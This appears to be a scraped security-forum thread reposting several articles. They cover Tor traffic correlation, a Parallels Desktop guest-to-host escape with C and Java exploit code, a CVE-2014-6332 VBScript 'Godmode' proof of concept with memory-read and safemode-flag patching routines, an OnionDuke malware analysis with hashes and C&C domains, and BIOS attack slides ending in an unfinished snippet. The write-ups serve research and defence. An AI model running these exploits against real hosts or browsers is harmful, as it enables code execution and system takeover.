The way we generally explain it is that Tor tries to protect against traffic analysis, where an attacker tries to learn whom to investigate, but Tor can't protect against traffic confirmation (also known as end-to-end correlation), where an attacker tries to confirm a hypothesis by monitoring the right locations in the network and then doing the math. And the math is really effective. There are simple packet counting attacks (Passive Attack Analysis for Connection-Based Anonymity Systems) and moving window averages (Timing Attacks in Low-Latency Mix-Based Systems), but the more recent stuff is downright scary, like Steven Murdoch's PET 2007 paper about achieving high confidence in a correlation attack despite seeing only 1 in 2000 packets on each side (Sampled Traffic Analysis by Internet-Exchange-Level Adversaries).

Second, there's some further discussion about the efficacy of traffic correlation attacks at scale in the "Improving Tor's anonymity by changing guard parameters" analysis:

Tariq's paper makes two simplifying assumptions when calling an attack successful [...] 2) He assumes that the end-to-end correlation attack (matching up the incoming flow to the outgoing flow) is instantaneous and perfect. [...] The second one ("how successful is the correlation attack at scale?" or maybe better, "how do the false positives in the correlation attack compare to the false negatives?") remains an open research question. Researchers generally agree that given a handful of traffic flows, it's easy to match them up. But what about the millions of traffic flows we have now? What levels of false positives (algorithm says "match!" when it's wrong) are acceptable to this attacker? Are there some simple, not too burdensome, tricks we can do to drive up the false positive rates, even if we all agree that those tricks wouldn't work in the "just looking at a handful of flows" case?
More precisely, it's possible that correlation attacks don't scale well because as the number of Tor clients grows, the chance that the exit stream actually came from a different Tor client (not the one you're watching) grows. So the confidence in your match needs to grow along with that or your false positive rate will explode. The people who say that correlation attacks don't scale use phrases like "say your correlation attack is 99.9% accurate" when arguing it. The folks who think it does scale use phrases like "I can easily make my correlation attack arbitrarily accurate." My hope is that the reality is somewhere in between: correlation attacks in the current Tor network can probably be made plenty accurate, but perhaps with some simple design changes we can improve the situation.

The discussion of false positives is key to this new paper too: Sambuddho's paper mentions a false positive rate of 6%. That sounds like it means that if you see a traffic flow at one side of the Tor network, and you have a set of 100000 flows on the other side and you're trying to find the match, then 6000 of those flows will look like a match. It's easy to see how at scale, this "base rate fallacy" problem could make the attack effectively useless. (A quick back-of-the-envelope calculation of this point follows the post.)

And that high false positive rate is not at all surprising, since he is trying to capture only a summary of the flows at each side and then do the correlation using only those summaries. It would be neat (in a theoretical sense) to learn that it works, but it seems to me that there's a lot of work left here in showing that it would work in practice. It also seems likely that his definition of false positive rate and my use of it above don't line up completely: it would be great if somebody here could work on reconciling them.

For a possibly related case where a series of academic research papers misunderstood the base rate fallacy and came to bad conclusions, see Mike's critique of website fingerprinting attacks plus the follow-up paper from CCS this year confirming that he's right.

I should also emphasize that whether this attack can be performed at all has to do with how much of the Internet the adversary is able to measure or control. This diversity question is a large and important one, with lots of attention already. See more discussion here.

In summary, it's great to see more research on traffic confirmation attacks, but a) traffic confirmation attacks are not a new area, so don't freak out without actually reading the papers, and b) this particular one, while kind of neat, doesn't supersede all the previous papers.

(I should put in an addendum here for the people who are wondering if everything they read on the Internet in a given week is surely all tied together: we don't have any reason to think that this attack, or one like it, is related to the recent arrests of a few dozen people around the world. So far, all indications are that those arrests are best explained by bad opsec for a few of them, and then those few pointed to the others when they were questioned.)

Source: https://blog.torproject.org/blog/traffic-correlation-using-netflows
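As referenced above, here is a back-of-the-envelope sketch of the base rate fallacy using the post's numbers. The Bayesian framing is our illustration, not the paper's methodology:

    def posterior_match(fpr, tpr, n_flows):
        # P(true match | detector says "match"), with exactly one genuine
        # match hidden among n_flows candidate flows.
        prior = 1.0 / n_flows
        p_flagged = tpr * prior + fpr * (1.0 - prior)
        return (tpr * prior) / p_flagged

    # One genuine flow among 100,000 candidates, 6% false positive rate,
    # and (generously) perfect recall:
    print(posterior_match(fpr=0.06, tpr=1.0, n_flows=100_000))
    # ~0.00017: a flagged flow is almost certainly a false positive.

Even with a perfect true positive rate, the sheer number of innocent candidate flows swamps the one real match, which is exactly the scaling concern the post raises.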
  9. Simple guest to host VM escape for Parallels Desktop

This is the first post in this blog written in English; please be patient with my awful language skills.

This is a little story about exploiting a guest-to-host VM escape not-a-vulnerability in Parallels Desktop 10 for Mac. The discovered attack is not about serious hardcore stuff like hypervisor bugs or low-level vulnerabilities in guest-host communication interfaces; it can be easily performed even by very lame Windows malware if your virtual machine has insecure settings.

Discovering

It was always obvious to me that rich features for communicating with the guest operating systems (almost any modern desktop virtualisation software has them) might be dangerous. Recently I finally decided to check how exactly they can be dangerous, using the virtualisation software that I'm using on OS X (as are millions of other users). It's a nice product and I think that it currently gets much less attention from security researchers than it actually deserves.

Parallels Desktop 10 virtual machines have a lot of user-friendly capabilities for making the guest operating system highly integrated with the host, and most of these options are enabled by default. Let's talk about one of them:

[Image: Parallels Desktop 10 VM options]

There is an "Access Windows folder from Mac" option that looks pretty innocent (please note that all other sharing options are off). This option is enabled by default for all virtual machines as well, and here is the description of this option from the Parallels Desktop 10 for Mac User's Guide:

Access a Windows Folder or File from a Mac OS X Application

By default, you can navigate to all your Windows folders and files from Mac OS X. Windows disks are mounted to /Volumes. At the same time, Windows appears as a hard disk mounted on the Mac OS X desktop. Note: The Windows disk disappears from the desktop and the Finder, but you can still access all of the Windows files and folders via the Windows PVM file and Terminal (/Volumes). By default, the PVM file is either in /Users/<Username>/Documents/Parallels/ or /Users/Shared. You can also find the PVM file by right-clicking Windows in Parallels Desktop Control Center (or in the virtual machine window when Windows is shut down) and selecting Show in Finder. To access Windows files and folders, right-click the PVM file, select Show Package Contents from the context menu, and open the Windows Disks folder. To disable the ability to navigate to Windows files and folders, deselect Access Windows folders from Mac in step 3 above.

Well, just guest file system sharing, you'll say: what could possibly go wrong? Unfortunately, a lot. After enabling this option you can also notice a very interesting "Open on Mac" item in the context menu of Windows Explorer:

Looks promising, right? Technically this option asks the piece of Parallels software working on the host side to do the equivalent of double-clicking on the target file in Finder. The guest-side part of this option is implemented as the PrlToolsShellExt.dll shell extension (the MD5 sum of the DLL with version 10.1.1.28614 on my Windows 8.1 x64 guest is 97D15FB584C589FA297434E08CD0252F).
The menu item click handler is located at function sub_180005834() and, after some pre-processing of the input values, it sends an IOCTL request to the device \Device\prl_tg, which belongs to one of the Parallels kernel-mode drivers (prl_tg.sys).

After a breakpoint on this DeviceIoControl() call we obtain a call stack backtrace and the function arguments:

    0:037> k L7
    Child-SP          RetAddr           Call Site
    00000000`12bcd1c0 00007ff9`2a016969 PrlToolsShellExt!DllUnregisterServer+0x1596
    00000000`12bcd310 00007ff9`2a01fd71 SHELL32!Ordinal93+0x225
    00000000`12bcd410 00007ff9`2a4cf03a SHELL32!SHCreateDefaultContextMenu+0x581
    00000000`12bcd780 00007ff9`2a4cc4b1 SHELL32!Ordinal927+0x156c2
    00000000`12bcdaf0 00007ff9`2a4c76f7 SHELL32!Ordinal927+0x12b39
    00000000`12bcded0 00007ff9`21d09944 SHELL32!Ordinal927+0xdd7f
    00000000`12bcdf20 00007ff9`21d059d3 explorerframe!UIItemsView::ShowContextMenu+0x298

The first 4 arguments of DeviceIoControl(): rcx is the device handle, r8 the input buffer, r9 the buffer length:

    0:037> r
    rax=0000000012bcd240 rbx=0000000000000000 rcx=0000000000000d74
    rdx=000000000022a004 rsi=0000000000000001 rdi=0000000000000070
    rip=00007ff918bd5b92 rsp=0000000012bcd1c0 rbp=000000000022a004
    r8=0000000012bcd240  r9=0000000000000070  r10=000000001a5bc990
    r11=000000001a5bd110 r12=0000000000000002 r13=0000000012bcd490
    r14=0000000012bcd4a0 r15=0000000016af90f0

The last 4 arguments of DeviceIoControl(), which were passed over the stack:

    0:037> dq rsp L4
    00000000`12bcd1c0 00000000`00000000 00000000`02bdc218
    00000000`12bcd1d0 00000000`00000001 00000000`00ce2480

The IOCTL request input buffer:

    0:037> dq @r8
    00000000`12bcd240 ffffffff`00008321 00000000`00010050
    00000000`12bcd250 00000000`00000001 00000000`00000002
    00000000`12bcd260 00000000`00000002 00000000`00000000
    00000000`12bcd270 00000000`00000000 00000000`00000000
    00000000`12bcd280 00000000`00000000 00000000`00000000
    00000000`12bcd290 00000000`00000000 00000000`00000000
    00000000`12bcd2a0 00000000`02c787d0 00000000`0000003c

It consists of several magic values and a pointer to the ASCII string with the target file path at offset 0x60:

    0:037> da poi(@r8+60)
    00000000`02c787d0 "\\psf\TC\dev\_exploits\prl_guet_"
    00000000`02c787f0 "to_host\New Text Document.txt"

After sending this IOCTL request to the driver, the specified file will be opened on the host side. It's also interesting and useful that this action can be triggered from a Windows user account with any privileges (including Guest):

[Image: \Device\prl_tg security permissions]

And because the target file will be opened on the host side with the privileges of the current OS X user, it seems that the "Access Windows folder from Mac" option definitely breaks the security model that you usually expect from guest-host interaction.

Exploiting

The following function was implemented after some short reverse engineering of the shell extension. It interacts with the Parallels kernel driver and executes the specified file on the host side:

    void OpenFileAtTheHostSide(char *lpszFilePath)
    {
        HANDLE hDev = NULL;

        // get a handle to the target device
        if (OpenDevice(L"\\Device\\prl_tg", &hDev))
        {
            PDWORD64 RequestData = (PDWORD64)LocalAlloc(LMEM_FIXED, 0x70);
            if (RequestData)
            {
                IO_STATUS_BLOCK StatusBlock;

                ZeroMemory(RequestData, 0x70);
                /* Fill the IOCTL request input buffer.
                   It has the same layout on x86 and x64 versions of Windows. */
                RequestData[0x0] = 0xffffffff00008321; // magic values
                RequestData[0x1] = 0x0000000000010050;
                RequestData[0x2] = 0x0000000000000001;
                RequestData[0x3] = 0x0000000000000002;
                RequestData[0x4] = 0x0000000000000002;
                RequestData[0xc] = (DWORD64)lpszFilePath; // file path and its length
                RequestData[0xd] = (DWORD64)strlen(lpszFilePath) + 1;

                NTSTATUS ns = NtDeviceIoControlFile(
                    hDev, NULL, NULL, NULL, &StatusBlock,
                    0x22a004, // IOCTL code
                    RequestData, 0x70,
                    RequestData, 0x70
                );
                DbgMsg(__FILE__, __LINE__, "Device I/O control request status is 0x%.8x\n", ns);

                // ...

                M_FREE(RequestData);
            }
            CloseHandle(hDev);
        }
    }

Now let's write some payload. Unfortunately, we can't execute a shell script or an AppleScript file in this way, because such files will be opened in a text editor. But there are still a lot of other evil things an attacker can do with the ability to open an arbitrary file. For example, it's possible to write a Java .class that executes a specified command and saves its output to the guest file system (usually mounted at /Volumes/<windows_letter>):

    public static void main(String[] args)
    {
        // execute command and get its output
        StringBuilder output = new StringBuilder();
        if (exec(defaultCmd, output) == -1)
        {
            output.append("Error while executing command");
        }
        String volumesPath = "/Volumes";
        File folder = new File(volumesPath);

        // enumerate mounted volumes of Parallels guests
        for (File file : folder.listFiles())
        {
            if (file.isDirectory())
            {
                // try to save the command output into the guest's temp directory
                String outFile = volumesPath + "/" + file.getName() + "/Windows/Temp/prl_host_out.txt";
                try
                {
                    write(outFile, output.toString());
                }
                catch (IOException e)
                {
                    continue;
                }
            }
        }
    }

Using this .class and the OpenFileAtTheHostSide() function we can implement a usable command execution exploit:

[Image: Execution of commands using the PoC]

The full exploit code is available at GitHub: https://github.com/Cr4sh/prl_guest_to_host

Protection from this attack is pretty simple: disabling the "Access Windows folder from Mac" option in the virtual machine settings prevents the ability to open files from the guest systems. Also, you can enable the "Isolate Windows from Mac" option, which disables (in theory) all of the virtual machine sharing features.

TL;DR

This is arguably an incomplete-documentation issue rather than a vulnerability: it's absolutely not obvious to the user that guest file system sharing can lead to arbitrary code execution on the host side. The exploit is very simple and reliable, works under all versions of Windows on guest machines, and the attack can be performed with the privileges of any Windows user that belongs to the Everyone security group. This issue is also relevant to other guest operating systems (like Linux and OS X); however, the provided PoC was designed only for Windows. It would be good to disable the sharing options of virtual machines if such an attack vector might be critical for your threat model.

I think it's very unlikely that Parallels will release any significant fixes or improvements for the described mechanisms, because any reasonable fix would break the easy way of opening Windows documents on a Mac. I played a bit with only one sharing option, but who knows how many similar (or even worse) security issues actually exist in Parallels, VMware and Oracle products.

PS: Have good fun at ZeroNights; too bad that this year I'm missing it.
Posted by Cr4sh

Source: My aimful life: Simple guest to host VM escape for Parallels Desktop
  10. RST T-shirt

So, opinions, suggestions? Who else wants one?
  11. And, what stage is the project at?
  12. Bypassing Address Space Layout Randomization

Toby 'TheXero' Reynolds, April 15, 2012

Contents: Introduction; Method 1 - Partial overwrite; Method 2 - Non-ASLR; Method 3 - Brute force; Conclusion

Download: http://nullsecurity.net/papers/nullsec-bypass-aslr.pdf
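As a quick taste of the first method listed (our sketch, not an excerpt from the paper): ASLR randomizes the high-order bits of module bases, but the low 12 bits of any code address are a fixed page offset, so overwriting only the low bytes of a saved return address can redirect execution without knowing the randomized bits.

    # Hypothetical addresses for illustration only.
    ret_addr = 0x7F3A12345F10  # saved return address on the stack
    gadget   = 0x7F3A12345ABC  # target in the same randomized module

    # A 2-byte partial overwrite replaces only the low 16 bits, keeping
    # the randomized upper bytes that the attacker never learned:
    forged = (ret_addr & ~0xFFFF) | (gadget & 0xFFFF)
    assert forged == gadget    # works when both lie in the same 64 KiB region
    print(hex(forged))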
  13. A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332

by Weimin Wu (Threat Analyst)

Microsoft released 16 security updates during its Patch Tuesday release for November 2014, among which is CVE-2014-6332, the Windows OLE Automation Array Remote Code Execution Vulnerability (covered in MS14-064). We would like to bring attention to this particular vulnerability for the following reasons:

* It impacts almost all Microsoft Windows versions from Windows 95 onward.
* A stable exploit exists and works in versions of Internet Explorer from 3 to 11, and can bypass operating system (OS) security utilities and protections such as the Enhanced Mitigation Experience Toolkit (EMET), Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control-Flow Integrity (CFI).
* Proof of concept (PoC) exploit code has recently been published by a Chinese researcher named Yuange1975. Based on the PoC, it's fairly simple to write malicious VBScript code for attacks. Attackers may soon utilize the PoC to target unpatched systems.

About the CVE-2014-6332 Vulnerability

The bug is caused by improper handling of the resizing of an array in the Internet Explorer VBScript engine. VBScript is the default scripting language in ASP (Active Server Pages). Other browsers like Google Chrome do not support VBScript, but Internet Explorer still supports it via a legacy engine to ensure backward compatibility.

An array has the following structure in the VBScript engine:

    typedef struct tagSAFEARRAY {
        USHORT cDims;
        USHORT fFeatures;
        ULONG cbElements;
        ULONG cLocks;
        PVOID pvData;
        SAFEARRAYBOUND rgsabound[1];
    } SAFEARRAY;

    typedef struct tagSAFEARRAYBOUND {
        ULONG cElements;
        LONG lLbound;
    } SAFEARRAYBOUND;

pvData is a pointer to the address of the array, and rgsabound[0].cElements stands for the number of elements in the array. Each element is a structure Var, whose size is 0x10:

    Var {
        0x00: varType
        0x04: padding
        0x08: dataHigh
        0x0c: dataLow
    }

A bug may occur upon redefining an array with a new length in VBScript, such as:

    redim aa(a0)
    ...
    redim Preserve aa(a1)

The VBScript engine will call the function OLEAUT32!SafeArrayRedim(), whose arguments are:

    First:  ppsaOUT      // the SAFEARRAY address
    Second: psaboundNew  // the address of the SAFEARRAYBOUND, which contains
                         // the new number of elements: arg_newElementsSize

[Figure 1. Code of function SafeArrayRedim()]

The function SafeArrayRedim() does the following steps:

* Get the size of the old array: oldSize = arg_pSafeArray->rgsabound[0].cElements * 0x10
* Set the new number onto the array: arg_pSafeArray->rgsabound[0].cElements = arg_newElementsSize
* Get the size of the new array: newSize = arg_newElementsSize * 0x10
* Get the difference: sub = newSize - oldSize
* If sub > 0, goto bigger_alloc (this branch has no problem)
* If sub < 0, goto less_alloc to reallocate memory via the function ole32!CRetailMalloc_Realloc()

In the exploit's case, execution takes this second branch: though sub is a huge positive value as an unsigned integer, it is treated as negative here, because the opcode jge works on signed integers. Here is the problem: an integer overflow (signed/unsigned confusion). cElements is used as an unsigned integer; oldSize, newSize and sub are used as unsigned integers; but sub is treated as a signed integer in the jge comparison.
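To make the signed/unsigned confusion concrete, here is a minimal Python sketch of the size arithmetic (our illustration, not code from the engine):

    def as_int32(x):
        # Reinterpret a 32-bit unsigned value as the signed integer
        # that the jge comparison actually sees.
        x &= 0xFFFFFFFF
        return x - 0x100000000 if x & 0x80000000 else x

    old_elems = 0x11                  # redim aa(a0): a small array
    new_elems = 0x11 + 0x8000000      # redim Preserve aa(a0 + &h8000000)

    old_size = (old_elems * 0x10) & 0xFFFFFFFF
    new_size = (new_elems * 0x10) & 0xFFFFFFFF  # 0x80000110: high bit set
    sub = (new_size - old_size) & 0xFFFFFFFF

    print(hex(sub))       # 0x80000000: huge as an unsigned value
    print(as_int32(sub))  # -2147483648: negative as signed, so the
                          # "shrink" path runs although the array grew,
                          # with cElements already set to the huge value

The dangerous state is the last point in the comment: cElements was updated before the branch, so after the failed "shrink" the array claims to be enormous while its buffer is not.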
The Dangerous PoC Exploit

This critical vulnerability can be triggered in a simple way. For the VBScript engine, there is a magic exploitation method called "Godmode". With "Godmode," arbitrary code written in VBScript can break out of the browser sandbox: attackers do not need to write shellcode and ROP chains, and DEP and ASLR protection is naturally useless here. Because we can do almost everything with VBScript in "Godmode," a file infector payload is not necessary in this situation either. This makes it easy to evade detections keyed on heap spray, Return Oriented Programming (ROP), shellcode, or a file infector payload. Next, we'll see how reliable the existing PoC is.

Exploiting the vulnerability

First, the exploit PoC performs type confusion using this vulnerability. It defines two arrays, aa and ab, and then resizes aa with a huge number:

a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)

Because arrays aa and ab have the same type and the same number of elements, it's possible to get the following array memory layout:

Figure 2. Expected memory layout of arrays aa, ab

When "redim Preserve aa(a2)", with a2 = a0+&h8000000, is run, it may trigger the vulnerability. If that happens, the out-of-bounds elements of aa become accessible, and the PoC uses them to perform type confusion on an element of ab. But the memory layout does not always meet this expectation, and the bug may not be triggered every time, so the PoC tries many times until the following conditions are met:

The address of ab(b0) is a pointer to the type field (naturally, b0=0 here)
The address of aa(a0) is a pointer to the data high field of ab(b0)

Which means: address(aa(a0)) is equal to address(ab(b0)) + 8.

Figure 3. Memory layout once the conditions are met

Then, modifying the data high field of ab(b0) is equivalent to modifying the type field of aa(a0): type confusion.

Second, the PoC uses the type confusion to make any memory address readable:

Function readmem(add)
    On Error Resume Next
    ab(b0)=0                      // type of aa(a0) is changed to int
    aa(a0)=add+4                  // the data high field of aa(a0) is set to add+4
    ab(b0)=1.69759663316747E-313  // this is 0x0000000800000008
                                  // now the type of aa(a0) is changed to bstr
    readmem=lenb(aa(a0))          // the length of a bstr is stored at pBstrBase-4
                                  // lenb(aa(a0)) = [pBstrBase-4] = [add+4-4]
    ab(b0)=0
end function

The above function returns the contents of any address [add]; this read primitive is used to enter "Godmode."

Enter "Godmode"

We know that VBScript can be used in browsers or in the local shell. When used in the browser, its behavior is restricted, but the restriction is controlled by some flags. That means that if the flags are modified, VBScript in HTML can do everything it can do in the local shell. That way, attackers can write malicious code in VBScript easily, which is known as "Godmode." The flags in question live in the object COleScript; if the address of COleScript is retrieved, the flags can be modified. The following function in the PoC exploit is used to enter "Godmode":

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)      // get address of CScriptEntryPoint, which includes a pointer to COleScript
    i=readmemo(i+16)     // get address of COleScript, which includes the said safemode flags
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4          // for compatibility across different IE versions
        j=readmemo(i+&h120+k)
        if(j=14) then
            j=0
            redim Preserve aa(a2)
            aa(a1+2)(i+&h11c+k)=ab(4)   // change safemode flags
            redim Preserve aa(a0)
            j=0
            j=readmemo(i+&h120+k)
            Exit for
        end if
    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

Both the arbitrary read above and this flag patching rest on the same Var type confusion, sketched below.
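A standalone C sketch of the underlying idea (a toy tagged value, not the real engine structures): flipping only the type tag reinterprets the same slot, which is exactly how readmem() turns an attacker-chosen integer into a "string" whose length read leaks memory. The VT_I4/VT_BSTR values match the real VARIANT type codes; the rest is illustrative, with the data halves packed into one pointer-sized field so the demo runs on 64-bit hosts too:

#include <stdio.h>
#include <stdint.h>
#include <string.h>

typedef struct {                /* toy version of the Var layout above    */
    uint16_t  varType;          /* 0x00: type tag                         */
    uint16_t  padding[3];
    uintptr_t data;             /* dataHigh/dataLow packed for this demo  */
} Var;

enum { VT_I4 = 3, VT_BSTR = 8 };

int main(void)
{
    uint32_t secret[2] = { 0xdeadbeef, 0 };   /* value we want to "leak"  */

    Var v;
    memset(&v, 0, sizeof v);
    v.varType = VT_I4;                        /* starts life as an int    */
    v.data = (uintptr_t)&secret[1];           /* add+4, attacker-chosen   */

    /* readmem(): flip the tag without touching the data... */
    v.varType = VT_BSTR;

    /* ...then "lenb" reads the 4 bytes at pBstrBase-4, i.e. [add]. */
    uint32_t *bstr = (uint32_t *)v.data;
    printf("leaked [add] = 0x%08x\n", bstr[-1]);
    return 0;
}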
Here, the function mydata() returns a variable of function-object type, which includes a pointer to CScriptEntryPoint. That raises a question: if the address of a function object is not accessible from VBScript, how does the PoC obtain it? The following function shows a smart trick in this PoC:

function mydata()
    On Error Resume Next
    i=testaa
    i=null
    redim Preserve aa(a2)
    ab(0)=0
    aa(a1)=i
    ab(0)=6.36598737437801E-314
    aa(a1+2)=myarray
    ab(2)=1.74088534731324E-310
    mydata=aa(a1)
    redim Preserve aa(a0)
end function

The key is in the first two lines of the function. We know that we cannot get the address of a function object in VBScript, so the line

i=testaa

seems to be nonsense. However, let's look at the call stack when executing it. Before this line, the stack is empty. First, the VM resolves testaa as a function and pushes its address onto the stack. Second, the VM resolves the address of i and attempts the assignment, but finds that the type of the value on the stack is a function object, so it returns an error and enters error handling. Because "On Error Resume Next" is set in mydata(), the VM continues with the next statement even though the error occurred:

i=null

For this line, the VM evaluates "null" first. For "null", the VM does not push new data onto the stack; instead, it only changes the type of the last value on the stack to 0x1! Then the VM assigns it to i, and that is exactly the address of the function testaa(), though the type of i is VT_NULL. These lines thus leak the address of function testaa() through a VT_NULL-typed variable.

Conclusion

The "Godmode" of the legacy VBScript engine is the most dangerous risk in Internet Explorer. If a suitable vulnerability is found, attackers can develop stable exploits with little effort, and CVE-2014-6332 is one of the vulnerabilities that lends itself most easily to this. Fortunately, Microsoft has released a patch for this particular CVE, but we still expect Microsoft to provide a direct fix for "Godmode," in the same way Chrome abandoned support for VBScript.

In addition, this vulnerability is fairly simple to exploit, and bypassing all protections to enter VBScript "Godmode" effectively makes attackers 'super users' with full control of the system; attackers do not necessarily need shellcode to compromise their targets. The scope of affected Windows versions is very broad, and many affected versions (such as Windows 95 and Windows XP) are no longer supported. This raises the risk for these older OSes in particular, as they remain vulnerable with no patch coming.

This vulnerability is very rare in that it affects almost all OS versions, while at the same time the exploit is advanced enough to bypass all Microsoft protections including DEP, ASLR, EMET, and CFI. With this killer combination of an advanced exploitation technique and a wide array of affected platforms, there's a high possibility that attackers will leverage this in future attacks.

Solutions and Recommendations

We highly recommend that users implement the following best practices: Install Microsoft patches immediately. Using any browser other than Internet Explorer until patching may also mitigate the risk. We also advise users to employ newer versions of Windows platforms that are supported by Microsoft. Trend Micro™ Deep Security and Vulnerability Protection, part of our Smart Protection Suites, are our recommended solutions for enterprises to defend their systems against these types of attacks.
Trend Micro Deep Security and Office Scan with the Intrusion Defense Firewall (IDF) plugin protect user systems from threats that may leverage this vulnerability via the following DPI rules: 1006324 – Windows OLE Automation Array Remote Code Execution Vulnerability (CVE-2014-6332) 1006290 – Microsoft Windows OLE Remote Code Execution Vulnerability 1006291 – Microsoft Windows OLE Remote Code Execution Vulnerability -1 For more information on the support for all vulnerabilities disclosed in this month’s Patch Tuesday, go to our Threat Encyclopedia page. Sursa: A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332
  14. OnionDuke: APT Attacks Via the Tor Network

Recently, research was published identifying a Tor exit node, located in Russia, that was consistently and maliciously modifying any uncompressed Windows executables downloaded through it. Naturally this piqued our interest, so we decided to peer down the rabbit hole. Suffice it to say, the hole was a lot deeper than we expected! In fact, it went all the way back to the notorious Russian APT family MiniDuke, known to have been used in targeted attacks against NATO and European government agencies. The malware used in this case is, however, not a version of MiniDuke. It is instead a separate, distinct family of malware that we have since taken to calling OnionDuke. But let's start from the beginning.

When a user attempts to download an executable via the malicious Tor exit node, what they actually receive is an executable "wrapper" that embeds both the original executable and a second, malicious executable. By using a separate wrapper, the malicious actors are able to bypass any integrity checks the original binary might contain. Upon execution, the wrapper will write to disk and execute the original executable, thereby tricking the user into believing that everything went fine. However, the wrapper will also write to disk and execute the second executable. In all the cases we have observed, this malicious executable has been the same binary (SHA1: a75995f94854dea8799650a2f4a97980b71199d2, detected as Trojan-Dropper:W32/OnionDuke.A). This executable is a dropper containing a PE resource that pretends to be an embedded GIF image file. In reality, the resource is an encrypted dynamically linked library (DLL) file. The dropper will proceed to decrypt this DLL, write it to disk and execute it.

A flowchart of the infection process

Once executed, the DLL file (SHA1: b491c14d8cfb48636f6095b7b16555e9a575d57f, detected as Backdoor:W32/OnionDuke.B) will decrypt an embedded configuration (shown below) and attempt to connect to hardcoded C&C URLs specified in the configuration data. From these C&Cs the malware may receive instructions to download and execute additional malicious components. It should be noted that we believe all five domains contacted by the malware are innocent websites compromised by the malware operators, not dedicated malicious servers.

A screenshot of the embedded configuration data

Through our research, we have also been able to identify multiple other components of the OnionDuke malware family. We have, for instance, observed components dedicated to stealing login credentials from the victim machine, and components dedicated to gathering further information on the compromised system, such as the presence of antivirus software or a firewall. Some of these components have been observed being downloaded and executed by the original backdoor process, but for other components we have yet to identify the infection vector. Most of these components don't embed their own C&C information but rather communicate with their controllers through the original backdoor process. One component, however, is an interesting exception. This DLL file (SHA1: d433f281cf56015941a1c2cb87066ca62ea1db37, detected as Backdoor:W32/OnionDuke.A) contains among its configuration data a different hardcoded C&C domain, overpict.com, and also evidence suggesting that this component may abuse Twitter as an additional C&C channel. What makes the overpict.com domain interesting is that it was originally registered in 2011 under the alias "John Kasai".
Within a two-week window, "John Kasai" also registered the following domains: airtravelabroad.com, beijingnewsblog.net, grouptumbler.com, leveldelta.com, nasdaqblog.net, natureinhome.com, nestedmail.com, nostressjob.com, nytunion.com, oilnewsblog.com, sixsquare.net and ustradecomp.com. This is significant because the domains leveldelta.com and grouptumbler.com have previously been identified as C&C domains used by MiniDuke. This strongly suggests that although OnionDuke and MiniDuke are two separate families of malware, the actors behind them are connected through the use of shared infrastructure.

A visualization of the infrastructure shared between OnionDuke and MiniDuke

Based on compilation timestamps and discovery dates of samples we have observed, we believe the OnionDuke operators have been infecting downloaded executables at least since the end of October 2013. We also have evidence suggesting that, at least since February of 2014, OnionDuke has not only been spread by modifying downloaded executables but also by infecting executables in .torrent files containing pirated software. However, it would seem that the OnionDuke family is much older, based both on older compilation timestamps and on the fact that some of the embedded configuration data make reference to an apparent version number of 4, suggesting that at least three earlier versions of the family exist.

During our research, we have also uncovered strong evidence suggesting that OnionDuke has been used in targeted attacks against European government agencies, although we have so far been unable to identify the infection vector(s). Interestingly, this would suggest two very different targeting strategies: on one hand, the "shooting a fly with a cannon" mass-infection strategy through modified binaries and, on the other, the more surgical targeting traditionally associated with APT operations.

In any case, although much is still shrouded in mystery and speculation, one thing is certain: while using Tor may help you stay anonymous, it also paints a huge target on your back. It's never a good idea to download binaries via Tor (or anything else) without encryption. The problem with Tor is that you have no idea who is maintaining the exit node you are using and what their motives are. VPNs (such as our Freedome VPN) will encrypt your connection all the way through the Tor network, so the maintainers of Tor exit nodes will not see your traffic and can't tamper with it.

Samples:
• a75995f94854dea8799650a2f4a97980b71199d2
• b491c14d8cfb48636f6095b7b16555e9a575d57f
• d433f281cf56015941a1c2cb87066ca62ea1db37

Detected as: Trojan-Dropper:W32/OnionDuke.A, Backdoor:W32/OnionDuke.A, and Backdoor:W32/OnionDuke.B. (A small checker against these hashes follows below.)

Post by — Artturi (@lehtior2)
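As a quick defensive aid, here is a minimal sketch (my own, not F-Secure's) that hashes a file with OpenSSL's legacy SHA1_* interface and compares the result against the indicators listed above; it assumes libcrypto is installed (build with: cc check_ioc.c -lcrypto):

#include <openssl/sha.h>
#include <stdio.h>
#include <string.h>

static const char *iocs[] = {   /* SHA1s from the post above */
    "a75995f94854dea8799650a2f4a97980b71199d2",
    "b491c14d8cfb48636f6095b7b16555e9a575d57f",
    "d433f281cf56015941a1c2cb87066ca62ea1db37",
};

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); return 2; }

    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror("fopen"); return 2; }

    SHA_CTX ctx;
    SHA1_Init(&ctx);
    unsigned char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, f)) > 0)
        SHA1_Update(&ctx, buf, n);
    fclose(f);

    unsigned char md[SHA_DIGEST_LENGTH];
    SHA1_Final(md, &ctx);

    char hex[SHA_DIGEST_LENGTH * 2 + 1];
    for (int i = 0; i < SHA_DIGEST_LENGTH; i++)
        sprintf(&hex[i * 2], "%02x", md[i]);

    for (size_t i = 0; i < sizeof iocs / sizeof *iocs; i++)
        if (strcmp(hex, iocs[i]) == 0) {
            printf("MATCH: known OnionDuke sample (%s)\n", hex);
            return 1;
        }
    printf("no match: %s\n", hex);
    return 0;
}

Sursa: OnionDuke: APT Attacks Via the Tor Network - F-Secure Weblog : News from the Lab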
  15. BIOS and Secure Boot Attacks Uncovered

Andrew Furtak, Yuriy Bulygin, Oleksandr Bazhaniuk, John Loucaides, Alexander Matrosov, Mikhail Gorobets

Signed BIOS Updates Are Rare
Mebromi malware includes BIOS infector & MBR bootkit components
• Patches BIOS ROM binary, injecting a malicious ISA Option ROM with a legitimate BIOS image mod utility
• Triggers SW SMI 0x29/0x2F to erase the SPI flash, then writes the patched BIOS binary (see the trigger sketch below)

No Signature Checks of OS boot loaders (MBR)
• No concept of Secure or Verified Boot
• Wonder why TDL4 and its likes flourished?
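For context on that second bullet: a software SMI is typically raised by writing a command byte to the APM control port, I/O port 0xB2 on common Intel chipsets. A minimal Linux userspace sketch of the trigger (my illustration, not the slides' code; requires root, and should only be run on hardware you own):

#include <stdio.h>
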